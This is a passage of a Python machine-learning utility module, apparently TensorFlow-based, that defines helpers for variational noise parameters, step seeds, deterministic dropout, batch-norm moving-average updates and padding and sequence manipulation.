    deterministic: Whether to generate noise with stateless random ops.

  Returns:
    A hyperparams.Params with the above fields Defined.
  """
  p = hyperparams.Params()
  # Bug fix: several help strings below previously contained typos
  # ("setp", "per-timesetp") and a missing space ("usingstateless").
  p.Define(
      'scale', scale,
      'Std of the variational noise to apply. This can be a scalar,'
      ' or a scalar tensor.')
  p.Define('global_vn', global_vn,
           'Adds global variational noise every training step iff True.')
  p.Define('per_step_vn', per_step_vn,
           'Adds per-timestep variational noise iff True.')
  p.Define('seed', seed, 'Random seed used to generate noise.')
  p.Define(
      'deterministic', deterministic, 'If true, generate noise using'
      ' stateless random ops that are compatible with TF functional ops.')
  return p
def DefaultVN():
  """Returns variational noise params with everything off and unset."""
  return VariationalNoiseParams(
      scale=None,
      global_vn=False,
      per_step_vn=False,
      seed=None,
      deterministic=False)
# To disable VN of a layer, pass 1.0 as the scale (first parameter) below:
# otherwise the params would equal DefaultVN(), which gets overwritten by the
# parent configuration in CopyBaseParams().
def DisableVN():
  """Returns VN params that keep variational noise disabled for a layer."""
  return VariationalNoiseParams(1.0, False, False)
# Per-thread map from graph id to the current step-seed tensor.
_STEP_SEED_DICT = ThreadLocalDict()
# Stack of multipliers; GetIncStepSeed advances the step seed by
# np.prod(_STEP_SEED_INCREMENT.stack) on each call.
_STEP_SEED_INCREMENT = ThreadLocalStack()
@contextlib.contextmanager
def StepSeedIncrementContext(step):
  """Pushes `step` onto _STEP_SEED_INCREMENT for the duration of the context.

  While active, GetIncStepSeed advances the step seed by an extra factor of
  `step`.

  Args:
    step: a positive increment factor.

  Yields:
    Nothing.
  """
  assert step > 0, '%s' % step
  _STEP_SEED_INCREMENT.stack.append(step)
  try:
    yield
  finally:
    # Always undo the push, even if the body raises.
    _STEP_SEED_INCREMENT.stack.pop()
def GetStepSeed():
  """Returns the current step-seed tensor for the default graph."""
  graph_key = id(tf.get_default_graph())
  if graph_key not in _STEP_SEED_DICT.dict:
    # Lazily initialize the seed for graphs we have not seen before.
    ResetStepSeed()
  return _STEP_SEED_DICT.dict[graph_key]
def ResetStepSeed(seed=0):
  """Resets the default graph's step seed to `seed`."""
  seed_tensor = tf.convert_to_tensor(seed, dtype=tf.int64)
  _STEP_SEED_DICT.dict[id(tf.get_default_graph())] = seed_tensor
def MaybeResetStepSeedFromScope():
  """In graph mode, resets step_seed according to the current named scope.

  This is used in graph mode to avoid "tensor is from a different graph"
  errors that happen when we share random seed tensors too much.
  See b/129159299 for more context.

  Eager mode does not have this problem, so in eager mode this is a no-op.
  """
  if tf.executing_eagerly():
    return
  # The no_op's fully scoped name is unique per call site, giving a
  # scope-dependent seed.
  scoped_name = tf.no_op(name='new_step_seed').name
  ResetStepSeed(GenerateSeedFromName(scoped_name))
def MaybeResetStepSeed(seed):
  """Resets the step seed to `seed`, but only when in graph mode."""
  if tf.executing_eagerly():
    return
  ResetStepSeed(seed)
def GetIncStepSeed():
  """Returns the current step_seed and then increments it."""
  # TODO(lepikhin): introduce a routine filling a queue of uint32 random seeds
  # independent of underlying PRNG used by tensorflow.
  current = GetStepSeed()
  increment = np.prod(_STEP_SEED_INCREMENT.stack)
  ResetStepSeed(current + increment)
  return current
def GenerateStepSeedPair(p, op_seed=None):
  """Generates a seed pair for deterministic random ops in functional loops.

  This function retrieves a unique seed pair on each call, based off the
  current global step and step seed. The step seed ensures this function
  returns a unique seed pair on each call: calling this function automatically
  increments the step seed. The step seed is automatically reset at the
  beginning of each global step in the model's FProp and works transparently
  through recurrent.py.

  Args:
    p: A hyperparams.Params object, containing keys 'random_seed' and
      'is_inference'.
    op_seed: An additional operation-level seed to apply.

  Returns:
    A size 2 tensor of op seeds to use for stateless_random ops.
  """
  seed_dtype = tf.int32 if use_tpu() else tf.int64
  if p.is_inference and p.random_seed is None:
    # Ensure GetIncStepSeed is called even inside this shortcut, so callers
    # that do set p.random_seed observe the same seed sequence either way.
    GetIncStepSeed()
    # Stateless random ops are completely determined by the passed-in seeds;
    # at inference time the same inputs would then produce the same outputs
    # even for intentionally random computations (e.g. dropout). When the
    # graph is exported with random_seed=None, inject fresh randomness here
    # as a workaround.
    return tf.random.uniform([2], maxval=seed_dtype.max, dtype=seed_dtype)
  seeds = tf.stack([
      tf.cast(GetGlobalStep(), seed_dtype),
      tf.cast(GetIncStepSeed(), seed_dtype),
  ])
  if p.random_seed is not None:
    seeds += p.random_seed
  if op_seed is not None:
    seeds += tf.cast(op_seed, seed_dtype)
  return seeds
def DeterministicDropout(x, keep_prob, seeds, noise_shape=None, name=None):
  """Similar to `tf.nn.dropout()`, but fully deterministic.

  Args:
    x: A float Tensor on which to apply dropout.
    keep_prob: A scalar `Tensor` of keep probability.
    seeds: A Tensor of shape [2]. 2 seeds for deterministic random number
      generator.
    noise_shape: A 1-D `Tensor` of type `int32`, representing the shape for
      randomly generated keep/drop flags.
    name: An optional name for this operation.

  Returns:
    A Tensor with the same shape as `x`.

  Raises:
    InvalidArgumentError: if keep_prob is invalid.
  """
  if isinstance(keep_prob, numbers.Real):
    if keep_prob <= 0 or keep_prob > 1:
      raise tf.errors.InvalidArgumentError(
          'keep_prob must be in range (0, 1]. Value: {}'.format(keep_prob))
    if keep_prob == 1:
      # keep_prob == 1 keeps everything: nothing to do.
      return x
  with tf.name_scope(name, 'dropout', [x]) as name:
    if use_tpu():
      seeds = tf.cast(seeds, tf.int32)
    keep_prob = tf.convert_to_tensor(
        keep_prob, dtype=tf.float32, name='keep_prob')
    # uniform in [keep_prob, 1.0 + keep_prob)
    # StatelessRandomUniform op does not support non-float (e.g. bfloat16)
    # dtype and non-int32 seed types.
    noise_shape = noise_shape or GetShape(x)
    random_tensor = keep_prob + tf.random.stateless_uniform(
        noise_shape, seed=seeds, dtype=tf.float32)
    # 0. if [keep_prob, 1.0) and 1. if [1.0, 1.0 + keep_prob)
    binary_tensor = tf.floor(random_tensor)
    if x.dtype != tf.float32:
      binary_tensor = tf.cast(binary_tensor, x.dtype)
      keep_prob = tf.cast(keep_prob, dtype=x.dtype)
    # Inverted dropout: scale kept values by 1/keep_prob so the expected
    # value is unchanged.
    result = tf.div(x, keep_prob) * binary_tensor
    result.set_shape(x.get_shape())
    return result
def DeterministicVN(params, seeds, noise_shape, mean=0.0, std=1.0, name=None):
  """Produces fully deterministic Gaussian noise from shape, mean and std.

  Args:
    params: Nested map of params.
    seeds: A Tensor of shape [2]; two seeds for the stateless RNG.
    noise_shape: A 1-D `Tensor` of type `int32`, the shape of the generated
      Gaussian noise.
    mean: Mean for the Gaussian noise.
    std: Standard deviation for the noise.
    name: An optional name for this operation.

  Returns:
    A Tensor with shape noise_shape and type FPropDtype(params).
  """
  with tf.name_scope(name, 'gaussian_noise') as name:
    if use_tpu():
      # Use int32 seeds on TPU (same convention as DeterministicDropout).
      seeds = tf.cast(seeds, tf.int32)
    noise = mean + (std * tf.random.stateless_normal(noise_shape, seed=seeds))
    fprop_dtype = FPropDtype(params)
    if fprop_dtype != tf.float32:
      noise = tf.cast(noise, fprop_dtype)
    return noise
# Graph collection that holds batch-norm moving-average update ops.
BATCH_NORM_UPDATES = 'batch_norm_updates'

# Key of the per-graph dict mapping update-op name -> (variable, stats); used
# by UpdateBatchNormVars (writer) and FindRelevantBatchNormUpdates (reader).
_BATCH_NORM_UPDATES_DICT = '__batch_norm_update_dict'
_get_batch_norm_updates_dict = _CollectionGetter(_BATCH_NORM_UPDATES_DICT,
                                                 lambda: {})
def UpdateBatchNormVars(batch_norm_var, batch_norm_stats, decay):
  """Update batch normalization moving averages.

  Args:
    batch_norm_var: the moving-average variable to update in place.
    batch_norm_stats: the freshly computed batch statistics.
    decay: the moving-average decay rate.

  Returns:
    The assign_sub op that applies the update to `batch_norm_var`.
  """
  with tf.name_scope(
      'AssignMovingAvg', values=[
          batch_norm_var,
          batch_norm_stats,
          decay,
      ]) as scope:
    with tf.ops.colocate_with(batch_norm_var):
      decay = tf.convert_to_tensor(
          1.0 - decay, dtype=batch_norm_var.dtype.base_dtype)
      update_delta = (batch_norm_var - tf.cast(
          batch_norm_stats, batch_norm_var.dtype.base_dtype)) * decay
      # Zero out the whole delta if it contains any NaN/Inf so bad batch
      # stats cannot poison the moving average.
      has_nan_or_inf = tf.reduce_any(
          tf.math.logical_or(
              tf.math.is_nan(update_delta), tf.math.is_inf(update_delta)))
      update_delta = tf.where(has_nan_or_inf, tf.zeros_like(update_delta),
                              update_delta)
      bn_update = tf.assign_sub(batch_norm_var, update_delta, name=scope)
  tf.add_to_collection(BATCH_NORM_UPDATES, bn_update)
  if not tf.executing_eagerly_outside_functions():
    # Record the (var, stats) pair so FindRelevantBatchNormUpdates can map an
    # update op back to the stats tensor it consumes.
    bn_update_dict = _get_batch_norm_updates_dict()
    if bn_update.name in bn_update_dict:
      raise ValueError(f'BN update {bn_update.name} already exists.')
    bn_update_dict[bn_update.name] = (batch_norm_var, batch_norm_stats)
  return bn_update
def FindRelevantBatchNormUpdates(loss, batch_norm_updates):
  """Finds and returns a list of relevant batch-normalization updates.

  Args:
    loss: The loss that is being optimized for. A tensor or a list of tensors.
    batch_norm_updates: A list of batch normalization updates.

  Returns:
    A pair of lists. The first list contains all the batch normalization
    updates that are relevant to the loss being optimized, and the second list
    contains all in batch_norm_updates but not in the first list.
  """
  if tf.executing_eagerly():
    return [], []
  dependent_ops_and_tensors = set(FindNeeded(loss))
  relevant_updates = []
  irrelevant_updates = []
  bn_update_dict = _get_batch_norm_updates_dict()
  for bn_update in batch_norm_updates:
    # Bug fix: the message's %s placeholder was never interpolated with the
    # offending op's name.
    assert bn_update.name in bn_update_dict, (
        '%s is probably not a valid batch normalization update op.'
        ' Make sure batch normalization is done through calling'
        ' the py_utils.UpdateBatchNormVars helper routine.' % bn_update.name)
    bn_stat_name = bn_update_dict[bn_update.name][1].name
    if bn_stat_name in dependent_ops_and_tensors:
      # If a batch normalization stat is computed in the forward pass in
      # computing loss, then the corresponding batch normalization update is
      # relevant. Otherwise, it is not.
      relevant_updates.append(bn_update)
    else:
      irrelevant_updates.append(bn_update)
  return relevant_updates, irrelevant_updates
# Per-thread stack of sample-step tensors pushed by SampleStep().
_SAMPLE_STEP_STACK = ThreadLocalStack()
@contextlib.contextmanager
def SampleStep(step):
  """A context for a sample step during decoding.

  Example usage::

    with py_utils.SampleStep(step):
      sample = self.DecodeOneStep()

  Args:
    step: the step tensor.

  Yields:
    a context manager for the step scope.
  """
  try:
    _SAMPLE_STEP_STACK.stack.append(step)
    yield step
  finally:
    # Always undo the push, even if the body raises.
    _SAMPLE_STEP_STACK.stack.pop()
def _GetSampleStep():
  """Returns the innermost SampleStep tensor, or None outside any context."""
  stack = _SAMPLE_STEP_STACK.stack
  if not stack:
    return None
  return stack[-1]
def AddDebugTensor(tensor, summarize=None, name=None):
  """Adds `tensor` to the debug collection.

  Prints the tensor if `--print_debug_tensors` is True.

  Args:
    tensor: A tensor.
    summarize: Only print this many entries of each tensor. If None, then a
      maximum of 3 elements are printed per input tensor.
    name: An optional name for the tensor.

  Returns:
    A Tensor that evaluates to the same value as the input tensor.
  """
  if not _FromGlobal('print_debug_tensors'):
    return tensor
  step = _GetSampleStep()
  # Include the sample step (when inside a SampleStep scope) in the printout.
  tensors_to_print = [tensor] if step is None else [step, tensor]
  with tf.name_scope(name) as scope:
    return tf.Print(
        tensor,
        tensors_to_print,
        message='DEBUG tensor %s' % scope,
        name=name,
        summarize=summarize)
def ArgMax(inputs):
  """tf.argmax wrapper.

  Args:
    inputs: A tensor, whose last dimension is being reduced on.

  Returns:
    A tensor of rank tf.rank(logits)-1. If i == ret[indices],
    logits[indices, i] is the maximum among logits[indices, :].
  """
  # On TPU, request int32 indices instead of the default int64.
  if use_tpu():
    return tf.argmax(inputs, axis=-1, output_type=tf.int32)
  return tf.argmax(inputs, axis=-1)
def _EnsureMatrixShape(x):
  """Asserts `x` is rank 2, setting an unknown rank to [None, None]."""
  if x.shape.ndims is None:
    x.set_shape([None, None])
    return x
  assert x.shape.ndims == 2
  return x
def Matmul(x, y, *args, **kwargs):
  """tf.matmul wrapper expecting x and y are actually matrices."""
  return tf.matmul(
      _EnsureMatrixShape(x), _EnsureMatrixShape(y), *args, **kwargs)
def clip_by_value(t, clip_value_min, clip_value_max, name=None):  # pylint: disable=invalid-name
  """tf.clip_by_value that also supports complex tensors.

  Complex tensors are clipped component-wise: the real and imaginary parts
  are independently clipped to [clip_value_min, clip_value_max].

  Args:
    t: A Tensor (real or complex).
    clip_value_min: Scalar minimum value to clip to.
    clip_value_max: Scalar maximum value to clip to.
    name: An optional name for the operation.

  Returns:
    A clipped Tensor of the same dtype as `t`.
  """
  if t.dtype.is_complex:
    # Bug fix: with name=None the original produced literal op names
    # 'None_real'/'None_imag'; fall back to TF's default naming instead.
    real_name = '%s_real' % name if name else None
    imag_name = '%s_imag' % name if name else None
    return tf.complex(
        tf.clip_by_value(
            tf.math.real(t), clip_value_min, clip_value_max, real_name),
        tf.clip_by_value(
            tf.math.imag(t), clip_value_min, clip_value_max, imag_name))
  return tf.clip_by_value(t, clip_value_min, clip_value_max, name)
def _TransformAndSum(tensor_list, transform):
  """Returns sum(reduce_sum(transform(t))) over all tensors in tensor_list."""
  with tf.name_scope('TransformAndSum'):
    partial_sums = []
    for t in tensor_list:
      with tf.device(t.device):
        # IndexedSlices carry their data in .values.
        dense = t.values if isinstance(t, tf.IndexedSlices) else t
        partial_sums.append(tf.reduce_sum(transform(dense)))
    return tf.add_n(partial_sums)
def SumSquared(tensor_list):
  """Returns the sum of |v|^2 over all elements of the given tensors."""
  return _TransformAndSum(tensor_list, lambda v: tf.abs(v)**2)
def SumAbs(tensor_list):
  """Returns the sum of |v| over all elements of the given tensors."""
  return _TransformAndSum(tensor_list, tf.abs)
def ReduceRms(x: tf.Tensor) -> tf.Tensor:
  """Computes root mean square of tensor x with numerical stability."""
  if not x.shape.is_fully_defined():
    raise ValueError('Shape of x must be fully defined.')
  dims = x.shape.as_list()
  if not dims:
    # Scalar input: its RMS is itself.
    return x
  denom = functools.reduce(lambda a, b: a * b, dims)
  if denom <= 1e8:
    return tf.math.sqrt(tf.math.reduce_mean(tf.math.square(x)))
  # Large tensors: reduce the innermost axis first, then the rest (see
  # docstring re numerical stability).
  tf.logging.info('reduce_rms %s denom=%d', x, denom)
  sum_sq = tf.math.reduce_sum(tf.math.reduce_sum(tf.math.square(x), -1))
  mean_sq = sum_sq / tf.constant(denom, dtype=sum_sq.dtype)
  return tf.math.sqrt(mean_sq)
def PiecewiseConstant(x_in, boundaries, values, vdtype):
  """Returns the piecewise value of x_in."""
  assert len(values) == len(boundaries) + 1
  assert sorted(boundaries) == list(boundaries)
  x_in = tf.cast(tf.convert_to_tensor(x_in), tf.float32)
  bs = tf.convert_to_tensor(boundaries, dtype=tf.float32)
  vs = tf.convert_to_tensor(values, dtype=vdtype)
  # Count the boundaries x_in has reached; that count indexes `values`.
  index = tf.reduce_sum(tf.cast(tf.greater_equal(x_in, bs), tf.int32))
  # The following is equivalent to 'return vs[index]'.
  one_hot_vec = tf.one_hot(
      tf.expand_dims(index, 0), depth=len(values), dtype=vdtype)
  return Matmul(tf.reshape(vs, (1, -1)), tf.transpose(one_hot_vec))[0][0]
def PadSequenceDimension(x, length, pad_val, shape=None, axis=1):
  """Pads x to `length` using `pad_val` along the axis dim.

  Assumes `x` is a tensor with rank >= 2, and it only pads `x` to `length`
  along the axis dim. Explicitly sets the returned tensor shape to `shape` if
  given. Raises runtime errors if x.shape[axis] > length or
  x.shape[i] != shape[i] where i != axis.

  Args:
    x: the tensor to be padded with axis dimension being the time. E.g., x
      usually has shape [batch, seq_len, ...], when axis=1.
    length: an int to specify the length to pad x to.
    pad_val: an int or float used to pad x.
    shape: an int array specifying the shape of the padded tensor if specified.
    axis: The dimension that x will be padded, default to 1.

  Returns:
    The padded tensor with shape [batch, seq_len, ...], where
    ret[:, :seq_len, ...] == x, when axis=1, and similarly for other axes.
  """
  if x.shape.ndims is not None:
    # Static-rank path: build the pad spec as a plain Python list.
    rank = x.shape.ndims
    assert rank >= 2
    slen = GetShape(x, rank)[axis]
    pad_len = length - slen
    pad = [[0, 0] for _ in range(rank)]
    pad[axis][1] = pad_len
  else:
    # Dynamic-rank path: build the pad spec as a tensor via scatter_nd.
    rank = tf.rank(x)
    with tf.control_dependencies([assert_greater_equal(rank, 2)]):
      slen = tf.shape(x)[axis]
    pad_len = length - slen
    pad = tf.scatter_nd([[axis, 1]], [pad_len], [rank, 2])
  x = tf.pad(x, pad, constant_values=pad_val)
  if x.shape.ndims is not None and isinstance(length, int):
    # tf.pad loses the static axis size; restore it when statically known.
    static_shape = x.shape.as_list()
    static_shape[axis] = length
    x.set_shape(static_shape)
  if shape:
    if not isinstance(shape, (list, tuple)):
      raise TypeError('Shape must be a list or tuple.')
    x = HasRank(x, len(shape))
    x = tf.ensure_shape(x, shape)
  return x
def PadSequenceTo(xs, padding, length, pad_val):
  """Pads `xs` and `padding` to `length` using `pad_val` along the 2nd dim.

  Pads `xs` to `length` using `pad_val`, and `padding` using 1. Raises an
  error if `x.shape[:2]` and `padding.shape` do not match.

  Args:
    xs: A Tensor or a list of Tensors of shape [batch, seqlen] or [batch,
      seqlen, ...].
    padding: A 0/1 Tensor of shape [batch, seqlen]. 1 is for padded locations.
    length: A Python int, the length to pad to.
    pad_val: A Python numeric, used for padding x.

  Returns:
    A tuple of padded xs and padding.
  """
  is_single = not isinstance(xs, (list, tuple))
  xs_list = [xs] if is_single else xs
  padded = []
  for x in xs_list:
    batch, slen = GetShape(x, 2)
    # Check that every x agrees with padding on [batch, seqlen].
    padding = HasRank(padding, 2)
    padding = HasShape(padding, [batch, slen])
    padded.append(PadSequenceDimension(x, length, pad_val))
  padding = PadSequenceDimension(padding, length, tf.cast(1, padding.dtype))
  if is_single:
    assert len(padded) == 1
    return padded[0], padding
  return tuple(padded), padding
def ApplyPadding(padding, x, padded=None, broadcast=True, use_select=True):
  """Applies padding to a tensor.

  This is preferable to using arithmetic means for masking out padded values
  such as::

      # Equiv to ApplyPadding(padding, x))
      x *= 1.0 - padding
      # Equiv to ApplyPadding(padding, new, old)
      new = old * padding + new * (1 - padding)

  Aside from just being easier to read and reason about, using this function
  is friendly to quantized representations because it does not mix arithmetic
  on the padding values with the values in the tensor being padded (which can
  have a very different range than the 0..1 padding tensor).

  In addition, this works around issues in quantized schemes where we are
  guaranteed to have an exact 0 but not necessarily any other number (i.e. 1).

  Args:
    padding: Tensor of padding values where 0 == keep and 1 == pad.
    x: Tensor to apply padding to.
    padded: Optional. Values to include for padded elements. Defaults to zeros.
      Must be the same shape as 'x' if specified.
    broadcast: Whether to broadcast the padding shape to the shape of 'x'. You
      almost certainly want this to be true as it matches how padding would be
      expanded if applied arithmetically.
    use_select: Controls whether padding is applied with a select-mask
      (True/default) or arithmetically (False). Some platforms have a
      sensitivity to one or the other and this is used to work around such
      issues.

  Returns:
    A tensor with the same shape as x with padded values masked.
  """
  # Runtime check that padding is strictly 0/1-valued; both paths below rely
  # on that invariant.
  padding = with_dependencies([
      Assert(
          tf.reduce_all(
              tf.math.logical_or(
                  tf.equal(padding, 0.0), tf.equal(padding, 1.0))), [padding])
  ], padding)
  if use_select:
    if padded is None:
      padded = tf.zeros_like(x)
    if broadcast:
      # Broadcast padding to the full shape by multiplying with ones_like(x).
      padding = tf.cast(padding, x.dtype) * tf.ones_like(x)
    return tf.where(padding > tf.zeros_like(padding), padded, x)
  else:
    result = x * tf.cast(1.0 - padding, x.dtype)
    if padded is not None:
      result += padded * tf.cast(padding, padded.dtype)
    return result
def LengthsFromPaddings(paddings):
  """Computes lengths of each sequence in a batch, ignoring trailing padding.

  Note the following isn't guaranteed due to leading paddings:
  PaddingsFromLengths(LengthsFromPaddings(x)) == x

  Args:
    paddings: a tensor with shape [batch, length].

  Returns:
    lengths tensor shaped [batch] containing the unpadded length of each
    sequence in the batch.
  """
  paddings = HasRank(paddings, 2)
  paddings = tf.cast(paddings, tf.int32)
  # Find the last unpadded value.
  # Cannot just use tf.reduce_sum because there might be leading paddings.
  # Everything after the last unpadded value has 1.0 - paddings == 0.0, so in
  # the cumsum below they will have the same value (as the last element).
  cumsum = tf.cumsum(1 - paddings, axis=1)
  same_as_last_element = tf.equal(cumsum, cumsum[:, -1:])
  # Counting the number of elements with the same value gives us num_padded + 1
  # and so counting the number that differs gives us num_padded - 1.
  length = tf.reduce_sum(
      1 - tf.cast(same_as_last_element, tf.int32), axis=1) + 1
  # Special case: fully padded rows would otherwise report length 1.
  all_zero_paddings = tf.equal(tf.reduce_sum(1 - paddings, axis=1), 0)
  return tf.where(all_zero_paddings, tf.zeros_like(length), length)
def PaddingsFromLengths(lengths, maxlen=None):
  """Computes a 0/1 paddings Tensor from lengths.

  Note the following isn't guaranteed due to leading paddings:
  PaddingsFromLengths(LengthsFromPaddings(x)) == x.
  This method does not generate leading paddings.

  Args:
    lengths: A int32 Tensor of shape [B].
    maxlen: None or a Python int or a scalar Tensor.

  Returns:
    A 0/1 valued Tensor of shape [B, maxlen or ?] where 1s are padded
    positions.
  """
  lengths = HasRank(lengths, 1)
  if maxlen is not None:
    # No length may exceed maxlen; otherwise the mask would silently truncate.
    longest = tf.cast(tf.reduce_max(lengths), tf.int32)
    lengths = with_dependencies([assert_less_equal(longest, maxlen)], lengths)
  return 1. - tf.sequence_mask(lengths, maxlen=maxlen, dtype=tf.float32)
def TrimTrailingPaddings(inputs, paddings):
  """Trims trailing paddings from inputs.

  Since the number of dimensions is not fixed, this will not work on TPU.

  Args:
    inputs: a tensor with shape [batch, length, ...].
    paddings: a tensor with shape [batch, length].

  Returns:
    Trimmed inputs and paddings. For compatibility reasons, the trimmed
    tensors will always have length at least 1.
  """
  paddings = HasRank(paddings, 2)
  # Keep at least one frame even when every position is padded.
  trimmed_len = tf.maximum(tf.reduce_max(LengthsFromPaddings(paddings)), 1)
  in_shape = tf.shape(inputs)
  out_shape = tf.concat([[in_shape[0], trimmed_len], in_shape[2:]], axis=0)
  trimmed_inputs = tf.slice(inputs, tf.zeros_like(out_shape), out_shape)
  trimmed_paddings = tf.slice(paddings, [0, 0],
                              tf.stack([out_shape[0], trimmed_len]))
  return trimmed_inputs, trimmed_paddings
def ReversePaddedSequence(inputs, paddings):
  """Reverses inputs based on paddings.

  Only reverses the unpadded portion of `inputs`. It assumes inputs are only
  padded in the end.

  Args:
    inputs: a tensor of [seq_length, batch_size, num_input_nodes].
    paddings: a tensor of float32/float64 zero or one of shape [seq_length,
      batch_size, 1].

  Returns:
    A reversed tensor of the same shape as `inputs`.
  """
  # Per-example unpadded lengths: count zeros in paddings along the time axis.
  mask = 1.0 - tf.squeeze(paddings, 2)
  lengths = tf.cast(tf.math.rint(tf.reduce_sum(mask, axis=0)), tf.int32)
  return tf.reverse_sequence(inputs, lengths, seq_axis=0, batch_axis=1)
def ConcatenatePaddedSequences(input0, input1, padding0, padding1, seq_dim=1):
  """Concatenates input sequences with varying lengths as defined by paddings.

  This is a helper function for concatenating 2 batches of input sequences,
  where each example in the batch can have different lengths, as defined by
  the corresponding paddings. To concatenate correctly, it makes use of
  tf.reverse_sequence to partially reverse the sequences before
  concatenating them together.

  NOTE: We assume that the tensors have no leading paddings.

  Args:
    input0: A tensor of size [batch, max_length, ...] or [max_length, batch,
      ...] depending on the value set for axis.
    input1: A tensor of size [batch, max_length, ...] or [max_length, batch,
      ...] depending on the value set for axis.
    padding0: A Tensor of size [batch, max_length] or [max_length, batch]
      corresponding to the padding for input0.
    padding1: A Tensor of size [batch, max_length] or [max_length, batch]
      corresponding to the padding for input1.
    seq_dim: int, the time axis along which the tensors will be concatenated.
      Should be 0 or 1. Assumes that batch_dim is 1 - seq_dim.

  Returns:
    The concatenation of input0 and input1, and the corresponding padding.

  Raises:
    tf.errors.InvalidArgumentError when seq_dim is not 0 or 1.
  """
  if seq_dim != 0 and seq_dim != 1:
    raise tf.errors.InvalidArgumentError(None, None, 'seq_dim must be 0 or 1.')
  batch_dim = 1 - seq_dim
  # input0 and input1 should have the same batch size and same rank.
  input0 = with_dependencies([
      assert_equal(GetShape(input0)[batch_dim],
                   GetShape(input1)[batch_dim]),
      assert_equal(GetRank(input0), GetRank(input1))
  ], input0)
  batch_size = GetShape(padding0)[batch_dim]
  # batch dimension of inputs and paddings should match.
  input0 = with_dependencies([
      assert_equal(GetShape(input0)[batch_dim], batch_size),
      assert_equal(GetShape(padding1)[batch_dim], batch_size)
  ], input0)
  # Full (padded) sequence lengths of each input, tiled to [batch].
  input0_seq_dim = tf.cast(
      tf.tile([tf.shape(padding0)[seq_dim]], [batch_size]), dtype=tf.int32)
  input1_seq_dim = tf.cast(
      tf.tile([tf.shape(padding1)[seq_dim]], [batch_size]), dtype=tf.int32)
  # LengthsFromPaddings assumes that paddings is of size [batch, max_length].
  if seq_dim == 1:
    seq_length0 = LengthsFromPaddings(padding0)
    seq_length1 = LengthsFromPaddings(padding1)
  else:
    seq_length0 = LengthsFromPaddings(tf.transpose(padding0))
    seq_length1 = LengthsFromPaddings(tf.transpose(padding1))
  # We assume that the tensors have no leading paddings.
  # TODO(arunnt): Concatenate tensors with leading paddings correctly.
  seq_length0 = with_dependencies([
      assert_equal(
          seq_length0,
          tf.cast(tf.reduce_sum(1.0 - padding0, seq_dim), dtype=tf.int32))
  ], seq_length0)
  seq_length1 = with_dependencies([
      assert_equal(
          seq_length1,
          tf.cast(tf.reduce_sum(1.0 - padding1, seq_dim), dtype=tf.int32))
  ], seq_length1)
  # Concatenate input sequences: reverse input0 by its unpadded length and
  # input1 by its full length, concatenate, then reverse the result back by
  # the combined length so the payloads end up adjacent.
  reversed_input0 = tf.reverse_sequence(
      input0, seq_length0, seq_axis=seq_dim, batch_axis=batch_dim)
  reversed_input1 = tf.reverse_sequence(
      input1, input1_seq_dim, seq_axis=seq_dim, batch_axis=batch_dim)
  reversed_concat = tf.concat([reversed_input1, reversed_input0], axis=seq_dim)
  concat_inputs = tf.reverse_sequence(
      reversed_concat,
      seq_length0 + input1_seq_dim,
      seq_axis=seq_dim,
      batch_axis=batch_dim)
  # Concatenate paddings. Note that paddings are always a Tensor of 0s and 1s,
  # so, unlike the inputs, we don't have to reverse padding1, we can simply
  # concatenate reversed padding0 and padding1.
  reversed_padding0 = tf.reverse_sequence(
      padding0, input0_seq_dim, seq_axis=seq_dim, batch_axis=batch_dim)
  reversed_concat_padding = tf.concat([reversed_padding0, padding1],
                                      axis=seq_dim)
  concat_paddings = tf.reverse_sequence(
      reversed_concat_padding,
      input0_seq_dim + seq_length1,
      seq_axis=seq_dim,
      batch_axis=batch_dim)
  return concat_inputs, concat_paddings
def ShiftLeft(tensor, shift_size, pad_val=0, axis=1):
  """Shifts the values in a tensor to the left along the axis dimension.

  The first shift_size values are dropped, and the tensor is padded on the
  right with pad_val.

  Args:
    tensor: the input tensor with the axis dim being time.
    shift_size: the number of frames >= 0 to shift.
    pad_val: the value to pad on the right of the tensor.
    axis: The dimension along which the tensor will be shifted, default to 1.

  Returns:
    A left shifted tensor on dimension axis.
  """
  rank = tensor.shape.rank
  with tf.control_dependencies(
      [assert_greater_equal(rank, 2),
       assert_greater_equal(shift_size, 0)]):
    time = GetShape(tensor)[axis]
    # Drop the first shift_size frames along `axis`, then right-pad back to
    # the original length `time`.
    begin = tf.scatter_nd([[axis]], [shift_size], [rank])
    shifted = tf.slice(tensor, begin, size=[-1] * rank)
    return PadSequenceDimension(shifted, time, pad_val, axis=axis)
def Retry(*args, **kwargs):
  """Thin pass-through wrapper over retry.Retry; see that API for arguments."""
  return retry.Retry(*args, **kwargs)
# TF errors considered transient and safe to retry:
# FailedPreconditionError: variables are not initialized.
# AbortedError: processes restarts.
# UnavailableError: Bad hardware status: 0x1
transient_tf_errors = (tf.errors.FailedPreconditionError,
                       tf.errors.AbortedError, tf.errors.UnavailableError)


def RetryOnTransientTfError(*args, **kwargs):
  """Returns a Retry decorator that retries on transient TF errors."""
  return Retry(transient_tf_errors, *args, **kwargs)
def PadOrTrimTo(x, shape, pad_val=0, pad_after_contents=True):
  """Pad and slice x to the given shape.

  Args:
    x: A tensor.
    shape: The shape of the returned tensor.
    pad_val: An int or float used to pad x.
    pad_after_contents: Whether to pad and trim after the original contents of
      each dimension.

  Returns:
    'x' is padded with pad_val and sliced so that the result has the given
    shape.

  Raises:
    ValueError: if shape is a tf.TensorShape and not fully defined.
  """
  if isinstance(shape, (list, tuple)):
    expected_rank = len(shape)
  elif isinstance(shape, tf.TensorShape):
    if not shape.is_fully_defined():
      raise ValueError('shape %s padding %s must be fully defined.' %
                       (shape, x))
    expected_rank = shape.rank
  else:
    # `shape` is a rank-1 tensor of dims; the rank is only known dynamically.
    shape = HasRank(shape, 1)
    expected_rank = tf.size(shape)
  x = HasRank(x, expected_rank)
  # Per-dimension pad amount; 0 wherever dim_i already >= shape[i].
  pad = shape - tf.minimum(tf.shape(x), shape)
  zeros = tf.zeros_like(pad)
  if pad_after_contents:
    # If dim_i is less than shape[i], pads after contents.
    paddings = tf.stack([zeros, pad], axis=1)
    # If dim_i is larger than shape[i], we slice [0:shape[i]] for dim_i.
    slice_begin = zeros
  else:
    # If dim_i is less than shape[i], pads before contents.
    paddings = tf.stack([pad, zeros], axis=1)
    # If dim-i is larger than shape[i], we slice [dim_i - shape[i]:dim_i]
    # for dim_i.
    slice_begin = tf.shape(x) + pad - shape
  x = tf.pad(x, paddings, constant_values=pad_val)
  x = tf.slice(x, slice_begin, shape)
  # Reshape to propagate the static shape when it is known.
  return tf.reshape(x, shape)
def RepeatDim(tensor, multiple, axis):
  """Copies elements in tensor's axis "multiple" times, like np.repeat.

  Example: for x = [[1, 2, 3], [4, 5, 6]],
  RepeatDim(x, multiple=2, axis=1) gives
